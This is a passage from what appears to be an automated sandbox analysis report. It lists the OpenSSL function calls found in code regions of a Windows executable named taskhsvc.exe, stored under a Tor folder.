            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB3E6C RAND_bytes,CRYPTO_free,86_2_6CDB3E6C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB1E60 CRYPTO_free,CRYPTO_malloc,__stack_chk_fail,86_2_6CDB1E60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCEA80 SSL_CTX_add_session,CRYPTO_add_lock,CRYPTO_lock,lh_insert,CRYPTO_add_lock,SSL_CTX_ctrl,SSL_CTX_ctrl,SSL_CTX_ctrl,lh_retrieve,CRYPTO_add_lock,CRYPTO_lock,lh_delete,CRYPTO_add_lock,lh_retrieve,__stack_chk_fail,86_2_6CDCEA80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCDE00 SSL_SESSION_get_ex_data,CRYPTO_get_ex_data,86_2_6CDCDE00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA7E20 CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,ERR_put_error,CRYPTO_lock,__stack_chk_fail,86_2_6CDA7E20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCAE20 SSL_load_error_strings,ERR_load_crypto_strings,86_2_6CDCAE20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD4CA0 X509_get_pubkey,EVP_PKEY_copy_parameters,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,X509_free,CRYPTO_add_lock,RSA_flags,EVP_PKEY_free,ERR_clear_error,ERR_put_error,ERR_put_error,EVP_PKEY_free,__stack_chk_fail,86_2_6CDD4CA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD8E20 asn1_GetSequence,ERR_put_error,asn1_add_error,SSL_SESSION_free,asn1_const_Finish,__stack_chk_fail,d2i_ASN1_OCTET_STRING,BUF_strndup,CRYPTO_free,d2i_ASN1_OCTET_STRING,ASN1_const_check_infinite_end,86_2_6CDD8E20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC9FD0 SSL_set_SSL_CTX,CRYPTO_add_lock,CRYPTO_add_lock,86_2_6CDC9FD0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDCFD1 SSL_shutdown,SSL_free,CRYPTO_free,CRYPTO_malloc,ERR_put_error,86_2_6CDDCFD1
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA1FC9 CRYPTO_malloc,EVP_CIPHER_CTX_init,86_2_6CDA1FC9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD7FF9 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,86_2_6CDD7FF9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCDFF2 CRYPTO_add_lock,CRYPTO_add_lock,BUF_strdup,BUF_strdup,sk_dup,CRYPTO_dup_ex_data,BUF_strdup,BUF_memdup,BUF_memdup,BUF_strdup,BUF_memdup,ERR_put_error,CRYPTO_add_lock,86_2_6CDCDFF2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA7FE0 CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,ERR_put_error,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,ERR_put_error,CRYPTO_lock,__stack_chk_fail,86_2_6CDA7FE0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBFF80 CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,__stack_chk_fail,86_2_6CDBFF80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD1FE2 CRYPTO_malloc,CRYPTO_free,sk_new_null,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD1FE2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCCF9C strlen,strlen,BIO_snprintf,SSL_add_file_cert_subjects_to_stack,OPENSSL_DIR_read,_errno,OPENSSL_DIR_end,CRYPTO_lock,86_2_6CDCCF9C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCAF90 SSL_get_ex_data_X509_STORE_CTX_idx,CRYPTO_lock,CRYPTO_lock,X509_STORE_CTX_get_ex_new_index,__stack_chk_fail,86_2_6CDCAF90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBFF80 CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,__stack_chk_fail,86_2_6CDBFF80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCAFBC CRYPTO_lock,CRYPTO_lock,86_2_6CDCAFBC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDADFB9 CRYPTO_free,86_2_6CDADFB9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCFFB0 SSL_state,SSL_state,CRYPTO_lock,lh_retrieve,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_add_lock,__stack_chk_fail,86_2_6CDCFFB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCDFB0 CRYPTO_malloc,ERR_put_error,__stack_chk_fail,SSL_SESSION_get_id,__stack_chk_fail,SSL_SESSION_get_compress_id,__stack_chk_fail,86_2_6CDCDFB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD5DB0 SSL_use_PrivateKey,X509_get_pubkey,EVP_PKEY_copy_parameters,EVP_PKEY_free,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,CRYPTO_add_lock,X509_check_private_key,ERR_clear_error,ERR_put_error,X509_check_private_key,ERR_put_error,RSA_flags,X509_free,ERR_put_error,ERR_put_error,EVP_PKEY_free,__stack_chk_fail,86_2_6CDD5DB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBCFA5 pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,pqueue_size,ERR_put_error,SSL_state,SSL_get_rbio,BIO_clear_flags,BIO_set_flags,SSL_state,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,ERR_put_error,SSL_get_rbio,BIO_clear_flags,SSL_get_rbio,BIO_set_flags,ERR_put_error,ERR_put_error,BIO_snprintf,ERR_add_error_data,SSL_CTX_remove_session,ERR_put_error,SSL_get_rbio,ERR_put_error,ERR_put_error,__stack_chk_fail,ERR_put_error,86_2_6CDBCFA5
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA7F57 CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,ERR_put_error,86_2_6CDA7F57
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCCF40 SSL_add_dir_cert_subjects_to_stack,CRYPTO_lock,OPENSSL_DIR_read,_errno,OPENSSL_DIR_end,CRYPTO_lock,86_2_6CDCCF40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD7F79 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,86_2_6CDD7F79
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA7F6C CRYPTO_lock,86_2_6CDA7F6C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD7C00 SSL_CTX_use_serverinfo_file,BIO_s_file,BIO_new,BIO_ctrl,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,strlen,strncmp,CRYPTO_realloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,SSL_CTX_use_serverinfo,__stack_chk_fail,86_2_6CDD7C00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD6F30 SSL_CTX_use_PrivateKey,X509_get_pubkey,EVP_PKEY_copy_parameters,EVP_PKEY_free,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,CRYPTO_add_lock,X509_check_private_key,ERR_clear_error,X509_check_private_key,RSA_flags,X509_free,ERR_put_error,ERR_put_error,EVP_PKEY_free,86_2_6CDD6F30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDCF29 BIO_free_all,CRYPTO_add_lock,86_2_6CDDCF29
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCEF20 SSL_CTX_remove_session,CRYPTO_lock,lh_retrieve,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_add_lock,__stack_chk_fail,86_2_6CDCEF20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB28D7 CRYPTO_free,CRYPTO_malloc,86_2_6CDB28D7
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC16D2 OpenSSLDie,pitem_new,pqueue_insert,OpenSSLDie,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,86_2_6CDC16D2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE8F2 ERR_put_error,CRYPTO_add_lock,BUF_strdup,86_2_6CDCE8F2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB0C09 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,strlen,strlen,SSL_get_srtp_profiles,strncmp,CRYPTO_malloc,strlen,ERR_put_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,sk_pop_free,sk_new_null,sk_push,d2i_OCSP_RESPID,sk_pop_free,d2i_X509_EXTENSIONS,__stack_chk_fail,CRYPTO_free,CRYPTO_malloc,OCSP_RESPID_free,OCSP_RESPID_free,86_2_6CDB0C09
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDE880 SRP_generate_client_master_secret,SRP_Verify_B_mod_N,SRP_Calc_u,SRP_Calc_x,SRP_Calc_client_key,BN_num_bits,CRYPTO_malloc,BN_bn2bin,OPENSSL_cleanse,CRYPTO_free,BN_clear_free,BN_clear_free,strlen,OPENSSL_cleanse,CRYPTO_free,BN_clear_free,BN_clear_free,BN_clear_free,BN_clear_free,BN_clear_free,__stack_chk_fail,86_2_6CDDE880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC98BC X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,BIO_ctrl,BIO_ctrl,CRYPTO_add_lock,86_2_6CDC98BC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDADB40 ERR_put_error,__stack_chk_fail,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,CONF_parse_list,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,EC_KEY_get0_group,EC_GROUP_method_of,EC_METHOD_get_field_type,EC_GROUP_get_curve_name,ERR_put_error,EC_GROUP_get_curve_name,__stack_chk_fail,86_2_6CDADB40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD08A0 CRYPTO_malloc,ERR_put_error,__stack_chk_fail,strncmp,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CDD08A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDE85C CRYPTO_malloc,BN_bn2bin,OPENSSL_cleanse,CRYPTO_free,BN_clear_free,BN_clear_free,86_2_6CDDE85C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE859 ERR_put_error,CRYPTO_add_lock,86_2_6CDCE859
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD9856 ERR_put_error,asn1_add_error,SSL_SESSION_free,ASN1_INTEGER_get,CRYPTO_free,asn1_const_Finish,ASN1_get_object,d2i_ASN1_OCTET_STRING,BUF_strndup,CRYPTO_free,d2i_ASN1_OCTET_STRING,ASN1_const_check_infinite_end,86_2_6CDD9856
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB879 CRYPTO_malloc,CRYPTO_add_lock,CRYPTO_add_lock,86_2_6CDCB879
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF870 SSL_set_session,SSL_set_ssl_method,CRYPTO_add_lock,CRYPTO_add_lock,CRYPTO_add_lock,SSL_set_ssl_method,ERR_put_error,__stack_chk_fail,SSL_SESSION_set_timeout,__stack_chk_fail,SSL_SESSION_get_timeout,__stack_chk_fail,SSL_SESSION_get_time,__stack_chk_fail,SSL_SESSION_set_time,__stack_chk_fail,SSL_SESSION_get0_peer,__stack_chk_fail,SSL_SESSION_set1_id_context,ERR_put_error,__stack_chk_fail,SSL_CTX_set_timeout,__stack_chk_fail,SSL_CTX_get_timeout,__stack_chk_fail,SSL_set_session_secret_cb,__stack_chk_fail,SSL_set_session_ticket_ext_cb,__stack_chk_fail,SSL_set_session_ticket_ext,CRYPTO_free,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,86_2_6CDCF870
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBC877 pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDBC877
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD7870 SSL_CTX_use_serverinfo,CRYPTO_realloc,SSL_CTX_add_server_custom_ext,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CDD7870
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA860 SSL_CTX_use_psk_identity_hint,strlen,CRYPTO_free,BUF_strdup,ERR_put_error,__stack_chk_fail,CRYPTO_free,86_2_6CDCA860
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC95D0 SSL_dup,SSL_new,SSL_copy_session_id,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,BIO_ctrl,BIO_ctrl,CRYPTO_add_lock,X509_VERIFY_PARAM_inherit,sk_dup,sk_dup,sk_dup,sk_value,X509_NAME_dup,sk_set,sk_num,X509_NAME_free,ERR_put_error,__stack_chk_fail,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,__stack_chk_fail,SSL_get_certificate,__stack_chk_fail,SSL_get_privatekey,__stack_chk_fail,SSL_CTX_get0_certificate,__stack_chk_fail,SSL_CTX_get0_privatekey,__stack_chk_fail,SSL_get_current_cipher,__stack_chk_fail,SSL_get_current_compression,__stack_chk_fail,SSL_get_current_expansion,__stack_chk_fail,86_2_6CDC95D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBC809 pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDBC809
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC09D9 pqueue_pop,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDC09D9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA19D0 __stack_chk_fail,COMP_CTX_free,COMP_CTX_new,EVP_CIPHER_CTX_cleanup,COMP_CTX_free,COMP_CTX_new,EVP_MD_size,EVP_CIPHER_key_length,EVP_CIPHER_iv_length,EVP_MD_CTX_init,EVP_CipherInit_ex,OPENSSL_cleanse,OPENSSL_cleanse,EVP_MD_CTX_cleanup,ERR_put_error,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,CRYPTO_malloc,EVP_CIPHER_CTX_init,CRYPTO_malloc,EVP_CIPHER_CTX_init,CRYPTO_malloc,ERR_put_error,OpenSSLDie,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_MD_size,EVP_CIPHER_key_length,EVP_CIPHER_iv_length,OPENSSL_cleanse,CRYPTO_free,CRYPTO_malloc,EVP_MD_CTX_init,EVP_MD_CTX_set_flags,EVP_MD_CTX_init,EVP_sha1,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,ERR_put_error,ERR_put_error,OPENSSL_cleanse,EVP_MD_CTX_cleanup,EVP_MD_CTX_cleanup,ERR_put_error,__stack_chk_fail,EVP_DigestFinal_ex,86_2_6CDA19D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCD9C0 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,__stack_chk_fail,lh_delete,CRYPTO_add_lock,__stack_chk_fail,86_2_6CDCD9C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD29C0 SSL_CIPHER_description,BIO_snprintf,CRYPTO_malloc,__stack_chk_fail,SSL_CIPHER_get_version,__stack_chk_fail,SSL_CIPHER_get_name,__stack_chk_fail,SSL_CIPHER_get_bits,__stack_chk_fail,SSL_CIPHER_get_id,__stack_chk_fail,86_2_6CDD29C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBF9F0 pqueue_find,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_new,pqueue_insert,OpenSSLDie,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,OpenSSLDie,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,86_2_6CDBF9F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD0999 CRYPTO_free,86_2_6CDD0999
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBCFA5 pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,pqueue_size,ERR_put_error,SSL_state,SSL_get_rbio,BIO_clear_flags,BIO_set_flags,SSL_state,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,ERR_put_error,SSL_get_rbio,BIO_clear_flags,SSL_get_rbio,BIO_set_flags,ERR_put_error,ERR_put_error,BIO_snprintf,ERR_add_error_data,SSL_CTX_remove_session,ERR_put_error,SSL_get_rbio,ERR_put_error,ERR_put_error,__stack_chk_fail,ERR_put_error,86_2_6CDBCFA5
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC09BC pqueue_peek,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,86_2_6CDC09BC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD929B0 EVP_MD_CTX_init,BN_num_bits,BN_num_bits,EVP_MD_CTX_set_flags,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,RSA_sign,EVP_MD_CTX_cleanup,DHparams_dup,DH_generate_key,BN_num_bits,BN_num_bits,BN_num_bits,BUF_MEM_grow_clean,BN_bn2bin,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_SignFinal,BN_num_bits,EC_KEY_dup,EC_KEY_get0_public_key,EC_KEY_get0_private_key,EC_KEY_generate_key,EC_KEY_get0_group,EC_KEY_get0_public_key,EC_KEY_get0_private_key,EC_GROUP_get_degree,EC_GROUP_get_curve_name,EC_KEY_get0_public_key,EC_POINT_point2oct,CRYPTO_malloc,BN_CTX_new,EC_KEY_get0_public_key,EC_POINT_point2oct,BN_CTX_free,strlen,strlen,strlen,strncpy,strlen,CRYPTO_free,EVP_PKEY_size,ERR_put_error,CRYPTO_free,BN_CTX_free,EVP_MD_CTX_cleanup,strlen,RSA_up_ref,ERR_put_error,EC_KEY_new_by_curve_name,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,ERR_put_error,ERR_put_error,86_2_6CD929B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9FD2C __stack_chk_fail,X509_STORE_CTX_init,ERR_put_error,X509_STORE_free,X509_STORE_CTX_set_flags,X509_verify_cert,X509_STORE_CTX_get1_chain,X509_STORE_CTX_cleanup,sk_pop_free,sk_shift,X509_free,X509_STORE_new,sk_num,sk_value,X509_STORE_add_cert,sk_num,X509_STORE_add_cert,ERR_peek_last_error,ERR_clear_error,sk_num,sk_num,sk_value,X509_check_purpose,sk_pop,X509_free,ERR_put_error,X509_STORE_CTX_get_error,X509_verify_cert_error_string,ERR_add_error_data,X509_STORE_CTX_cleanup,ERR_put_error,ERR_clear_error,ERR_peek_last_error,ERR_clear_error,__stack_chk_fail,X509_STORE_free,CRYPTO_add_lock,__stack_chk_fail,RAND_bytes,SSL_has_matching_session_id,__stack_chk_fail,86_2_6CD9FD2C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC37CE BUF_MEM_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,CRYPTO_free,SSL_SESSION_free,ERR_put_error,86_2_6CDC37CE
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC995C CRYPTO_add_lock,X509_NAME_free,86_2_6CDC995C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC7950 SSL_CTX_free,CRYPTO_add_lock,__stack_chk_fail,SSL_CTX_set_default_passwd_cb,86_2_6CDC7950
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE952 ERR_put_error,CRYPTO_add_lock,BUF_strdup,86_2_6CDCE952
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBA97C pqueue_free,pqueue_free,pqueue_free,pqueue_free,pqueue_free,CRYPTO_free,86_2_6CDBA97C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB3970 SSL_get_sigalgs,OBJ_find_sigid_by_algs,__stack_chk_fail,SSL_get_shared_sigalgs,__stack_chk_fail,CRYPTO_malloc,RAND_bytes,CRYPTO_free,CRYPTO_free,CRYPTO_free,86_2_6CDB3970
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE972 ERR_put_error,CRYPTO_add_lock,86_2_6CDCE972
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC0969 pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_free,86_2_6CDC0969
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC6964 sk_zero,CRYPTO_free,BUF_memdup,sk_push,ERR_put_error,sk_new_null,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,sk_free,86_2_6CDC6964
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB190 CRYPTO_malloc,RSA_up_ref,DHparams_dup,BN_dup,BN_dup,EC_KEY_dup,CRYPTO_add_lock,CRYPTO_add_lock,X509_chain_up_ref,CRYPTO_malloc,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_add_lock,CRYPTO_add_lock,ERR_put_error,RSA_free,DH_free,EC_KEY_free,X509_free,EVP_PKEY_free,sk_pop_free,CRYPTO_free,ERR_put_error,ERR_put_error,__stack_chk_fail,86_2_6CDCB190
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE912 ERR_put_error,CRYPTO_add_lock,BUF_strdup,86_2_6CDCE912
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCD90C X509_STORE_free,CRYPTO_add_lock,86_2_6CDCD90C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC1907 CRYPTO_free,CRYPTO_free,CRYPTO_free,86_2_6CDC1907
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA930 SSL_use_psk_identity_hint,strlen,CRYPTO_free,BUF_strdup,ERR_put_error,CRYPTO_free,__stack_chk_fail,SSL_get_psk_identity_hint,__stack_chk_fail,SSL_get_psk_identity,__stack_chk_fail,SSL_set_psk_client_callback,__stack_chk_fail,86_2_6CDCA930
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC6930 ERR_put_error,__stack_chk_fail,SSL_get_servername,__stack_chk_fail,SSL_get_servername_type,__stack_chk_fail,SSL_select_next_proto,__stack_chk_fail,SSL_get0_next_proto_negotiated,__stack_chk_fail,SSL_CTX_set_next_protos_advertised_cb,__stack_chk_fail,SSL_CTX_set_next_proto_select_cb,__stack_chk_fail,SSL_CTX_set_alpn_protos,CRYPTO_malloc,__stack_chk_fail,SSL_set_alpn_protos,CRYPTO_malloc,__stack_chk_fail,SSL_CTX_set_alpn_select_cb,__stack_chk_fail,SSL_get0_alpn_selected,__stack_chk_fail,SSL_export_keying_material,__stack_chk_fail,SSL_CTX_new,SSL_get_ex_data_X509_STORE_CTX_idx,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,SSL_CTX_free,__stack_chk_fail,SSL_CTX_set_default_passwd_cb,__stack_chk_fail,SSL_CTX_set_default_passwd_cb_userdata,__stack_chk_fail,SSL_CTX_set_cert_verify_callback,__stack_chk_fail,SSL_CTX_set_verify,__stack_chk_fail,SSL_CTX_set_verify_depth,__stack_chk_fail,SSL_CTX_set_cert_cb,__stack_chk_fail,SSL_set_cert_cb,__stack_chk_fail,86_2_6CDC6930
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB932 ERR_put_error,RSA_free,DH_free,EC_KEY_free,X509_free,EVP_PKEY_free,sk_pop_free,CRYPTO_free,86_2_6CDCB932
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE932 ERR_put_error,CRYPTO_add_lock,BUF_strdup,86_2_6CDCE932
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB2922 CRYPTO_free,CRYPTO_malloc,86_2_6CDB2922
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB6290 